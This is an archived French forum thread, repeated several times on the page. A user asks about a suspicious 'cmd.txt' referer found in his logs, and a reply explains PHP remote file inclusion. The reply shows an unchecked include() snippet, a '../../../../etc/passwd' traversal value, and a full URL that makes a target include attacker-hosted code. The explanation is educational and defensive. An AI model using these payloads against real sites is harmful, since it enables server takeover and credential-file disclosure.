J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.
Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Xavier Roche
Pierre wrote:
J'ai trouvé une page référente dans mes log http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur le contenu d'un site en passant des commandes en parametre. Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN
En gros, cela permet d'exploiter les failles d'inclusion dûes à des scripts mal protégés.
avec page.php: <?php @include($page.".php"); // variable exterieure non vérifiée! .. ?>
Ici premier problème: la variable "page" peut être arbitrairement écrite par l'utilisateur ; comme par exemple page=../../../../etc/passwd
Le problème additionnel c'est que les opérations comme fopen(), include() etc. sont en PHP par défaut compatibles avec autre chose que de la filesystem, et notamment permettent d'utiliser des protocoles comme HTTP.
Ainsi, en utilisant: http://www.example.com/page.php?page=http://www.geocities.com/r00t_exploit/cmd.txt on peut inclure le fichier hébergé sur le site en question.
Le problème, c'est que là on effectue une inclusion de *code*, et plus simplement d'une page HTML: on peut donc arbitrairement injecter du code PHP sur un serveur.
En sachant que PHP peut (s'il n'est pas placé en mode "safe") executer lui même des process sur la machine, comme un inetd(), on peut alors assez facilement entrer en mode user sur le serveur, et par la suite escalader en root, ou héberger un compte ftp pirate, envoyer du spam etc.
Pierre wrote:
J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.
Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN
En gros, cela permet d'exploiter les failles d'inclusion dûes à des
scripts mal protégés.
avec page.php:
<?php
@include($page.".php"); // variable exterieure non vérifiée!
..
?>
Ici premier problème: la variable "page" peut être arbitrairement écrite
par l'utilisateur ; comme par exemple page=../../../../etc/passwd
Le problème additionnel c'est que les opérations comme fopen(),
include() etc. sont en PHP par défaut compatibles avec autre chose que
de la filesystem, et notamment permettent d'utiliser des protocoles
comme HTTP.
Ainsi, en utilisant:
http://www.example.com/page.php?page=http://www.geocities.com/r00t_exploit/cmd.txt
on peut inclure le fichier hébergé sur le site en question.
Le problème, c'est que là on effectue une inclusion de *code*, et plus
simplement d'une page HTML: on peut donc arbitrairement injecter du code
PHP sur un serveur.
En sachant que PHP peut (s'il n'est pas placé en mode "safe") executer
lui même des process sur la machine, comme un inetd(), on peut alors
assez facilement entrer en mode user sur le serveur, et par la suite
escalader en root, ou héberger un compte ftp pirate, envoyer du spam etc.
J'ai trouvé une page référente dans mes log http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur le contenu d'un site en passant des commandes en parametre. Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN
En gros, cela permet d'exploiter les failles d'inclusion dûes à des scripts mal protégés.
avec page.php: <?php @include($page.".php"); // variable exterieure non vérifiée! .. ?>
Ici premier problème: la variable "page" peut être arbitrairement écrite par l'utilisateur ; comme par exemple page=../../../../etc/passwd
Le problème additionnel c'est que les opérations comme fopen(), include() etc. sont en PHP par défaut compatibles avec autre chose que de la filesystem, et notamment permettent d'utiliser des protocoles comme HTTP.
Ainsi, en utilisant: http://www.example.com/page.php?page=http://www.geocities.com/r00t_exploit/cmd.txt on peut inclure le fichier hébergé sur le site en question.
Le problème, c'est que là on effectue une inclusion de *code*, et plus simplement d'une page HTML: on peut donc arbitrairement injecter du code PHP sur un serveur.
En sachant que PHP peut (s'il n'est pas placé en mode "safe") executer lui même des process sur la machine, comme un inetd(), on peut alors assez facilement entrer en mode user sur le serveur, et par la suite escalader en root, ou héberger un compte ftp pirate, envoyer du spam etc.